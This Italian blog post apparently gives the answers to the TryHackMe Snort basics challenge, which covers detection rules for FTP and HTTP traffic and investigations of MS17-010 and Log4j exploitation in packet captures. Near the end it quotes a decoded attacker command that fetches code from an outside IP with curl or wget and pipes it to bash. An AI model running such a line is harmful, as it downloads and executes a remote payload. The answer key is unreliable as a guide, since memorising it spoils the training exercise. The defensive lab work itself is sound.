Abbiamo trattato l'utilizzo di Snort per analizzare il traffico FTP e HTTP creando e configurando le regole appropriate. Per applicare ciò che abbiamo imparato, abbiamo analizzato alcune acquisizioni di rete utilizzando Snort per testare le regole create e rilevare modelli di traffico. Questo faceva parte TryHackMe Snort Challenge – Le nozioni di base.

Appunti di studio di Sniffare

Corso completo Splunk SIEM con scenari pratici

Punti salienti

SNORT è un sistema di rilevamento e prevenzione delle intrusioni di rete open source e basato su regole (NIDS/NIPS). È stato sviluppato e tuttora gestito da Martin Roesch, contributori open source e dal team Cisco Talos. 
Capacità di Snort

  • Analisi del traffico in tempo reale
  • Rilevamento di attacchi e sonde
  • Registrazione dei pacchetti
  • Analisi del protocollo
  • Avvisi in tempo reale
  • Moduli e plugin
  • Preprocessori
  • Supporto multipiattaforma! (Linux e Windows)

Modalità operative dell'IDS Snort

  • Modalità annusatore – Leggere i pacchetti IP e richiederli nell'applicazione console.
  • Modalità registratore di pacchetti – Registra tutti i pacchetti IP (in entrata e in uscita) che visitano la rete.
  • Modalità NIDS e NIPS: registra/rilascia i pacchetti considerati dannosi in base alle regole definite dall'utente

Risposte in camera | Sfida Snort – Le basi

Qual è il numero di pacchetti rilevati?

Nota: È necessario rispondere correttamente a questa domanda prima di rispondere al resto delle domande di questa attività.

328

Esaminare il file di registro.

Qual è l'indirizzo di destinazione del pacchetto 63?

145.254.160.237

Esaminare il file di registro.

 Qual è il numero ACK del pacchetto 64?

0x38AFFFF3

Esaminare il file di registro.

Qual è il numero SEQ del pacchetto 62?

0x38AFFFF3

W

Esaminare il file di registro.

Qual è il TTL del pacchetto 65?

128

Esaminare il file di registro.

Qual è l'IP di origine del pacchetto 65?

145.254.160.237

Esaminare il file di registro.

Qual è la porta di origine del pacchetto 65?

3372

Utilizzare il file pcap fornito.

Scrivi regole per rilevare “tutta la porta TCP 21"traffico nel pcap specificato.

Qual è il numero di pacchetti rilevati?

614

Esaminare il file di registro.

Qual è il nome del servizio FTP?

Servizio FTP Microsoft

Cancella i file di registro e di allarme precedenti.

Disattiva/commenta le vecchie regole.

Scrivi una regola per rilevare i tentativi di accesso FTP falliti nel pcap specificato.

Qual è il numero di pacchetti rilevati?

41

Cancella i file di registro e di allarme precedenti.

Disattiva/commenta la vecchia regola.

Scrivi una regola per rilevare gli accessi FTP riusciti nel pcap specificato.

Qual è il numero di pacchetti rilevati?

1

Cancella i file di registro e di allarme precedenti.

Disattiva/commenta la vecchia regola.

Scrivi una regola per rilevare gli errori FTP tentativi di accesso con un nome utente valido ma una password errata o nessuna password.

Qual è il numero di pacchetti rilevati?

42

Cancella i file di registro e di allarme precedenti.

Disattiva/commenta la vecchia regola.

Scrivi una regola per rilevare gli errori FTP tentativi di accesso con nome utente "Amministratore" ma password errata o nessuna password.

Qual è il numero di pacchetti rilevati?

7

Passare alla cartella delle attività.

Utilizzare il file pcap fornito.

Scrivi una regola per rilevare il file PNG nel pcap specificato.

Esaminare i registri e identificare il nome del software incorporato nel pacchetto.

Adobe Imagereadyq

Cancella i file di registro e di allarme precedenti.

Disattiva/commenta la vecchia regola.

Scrivi una regola per rilevare il file GIF nel pcap specificato.

Esaminare i registri e identificare il formato dell'immagine incorporato nel pacchetto.

GIF89a

Passare alla cartella delle attività.

Utilizzare il file pcap fornito.

Scrivi una regola per rilevare il metafile torrent nel pcap specificato.

 Qual è il numero di pacchetti rilevati?

2

Esaminare i file di registro/allarme.

Qual è il nome dell'applicazione torrent?

bittorrent

Esaminare i file di registro/allarme.

Qual è il tipo MIME (Multifunction Internet Mail Extensions) del metafile torrent?

applicazione/x-bittorrent

Esaminare i file di registro/allarme.

Qual è il nome host del metafile torrent?

tracker2.torrentbox.com

In questa sezione è necessario correggere gli errori di sintassi nei file di regole specificati. 

Puoi testare ogni set di regole con la seguente struttura di comandi;

sudo snort -c local-X.rules -r mx-1.pcap -A console

Correggi l'errore di sintassi nel file local-1.rules e fallo funzionare senza intoppi.

Qual è il numero dei pacchetti rilevati?

16

Correggi l'errore di sintassi nel file local-2.rules e fallo funzionare senza intoppi.

Qual è il numero dei pacchetti rilevati?

68

Correggi l'errore di sintassi nel file local-3.rules e fallo funzionare senza intoppi.

Qual è il numero dei pacchetti rilevati?

87

Correggi l'errore di sintassi nel file local-4.rules e fallo funzionare senza intoppi.

Qual è il numero dei pacchetti rilevati?

90

Correggi l'errore di sintassi nel file local-5.rules e fallo funzionare senza intoppi.

Qual è il numero dei pacchetti rilevati?

155

Correggi l'errore logico nel file local-6.rules e fallo funzionare senza intoppi per creare avvisi.

Qual è il numero dei pacchetti rilevati?

2

Correggi l'errore logico nel file local-7.rules e fallo funzionare senza intoppi per creare avvisi.

Qual è il nome dell'opzione richiesta:

msg

Passare alla cartella delle attività.

Utilizzare il file pcap fornito.

Utilizzare il file di regole fornito (local.rules) per indagare sullo sfruttamento ms1710.

Qual è il numero di pacchetti rilevati?

25154

Cancella i file di registro e di allarme precedenti.

Utilizza il file vuoto local-1.rules per scrivere una nuova regola per rilevare i payload contenenti la parola chiave "\IPC$".

Qual è il numero di pacchetti rilevati?

12

Esaminare i file di registro/allarme.

Che cosa è il percorso richiesto?

\192.168.116.138\IPC$

Qual è il punteggio CVSS v2 della vulnerabilità MS17-010?

9.3

Utilizzare il file pcap fornito.

Utilizzare il file di regole fornito (local.rules) per indagare sullo sfruttamento di log4j.

Qual è il numero di pacchetti rilevati?

26

Esaminare i file di registro/allarme.

Quante regole sono state attivate?.

4

Esaminare i file di registro/allarme.

Quali sono le prime sei cifre dei sid delle regole attivate?

210037

Cancella i file di registro e di allarme precedenti.

Utilizza il file vuoto local-1.rules per scrivere una nuova regola per rilevare i payload dei pacchetti tra 770 e 855 byte.

Qual è il numero di pacchetti rilevati?

41

Esaminare i file di registro/allarme.

Che cosa è il nome dell'algoritmo di codifica utilizzato?

base64

Esaminare i file di registro/allarme.

Che cosa è l'ID IP del pacchetto corrispondente?

62808

Esaminare i file di registro/allarme.

Decodifica il comando codificato.

Qual è il comando dell'attaccante?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

Qual è il punteggio CVSS v2 della vulnerabilità Log4j?

9.3

Video Soluzione | TryHackMe Snort Challenge – Le nozioni di base

, , ,
Mostra commenti

Motasem

Circa l'autore

Creo note sulla sicurezza informatica, note di marketing digitale e corsi online. Fornisco anche consulenza di marketing digitale, inclusi ma non limitati a SEO, annunci Google e Meta e amministrazione CRM.

Visualizza articoli